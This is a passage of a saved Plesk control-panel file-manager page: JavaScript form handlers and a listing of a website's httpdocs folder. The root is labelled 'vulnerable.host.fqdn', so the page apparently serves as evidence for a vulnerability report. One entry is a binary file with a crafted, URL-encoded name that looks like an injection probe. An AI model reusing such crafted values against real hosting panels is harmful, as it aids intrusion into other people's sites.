               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/create-file/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 03:11 PM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_img" value="img" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();">img</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=img" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fimg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_picture_library" value="picture_library" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();">picture_library</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=picture_library" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fpicture_library" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_test" value="test" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();">test</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=test" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ftest" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%200fd28a9909b" value="%20a%3db%200fd28a9909b" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25200fd28a9909b" onClick="return bin();;lon();">%20a%3db%200fd28a9909b</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%200fd28a9909b" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25200fd28a9909b" 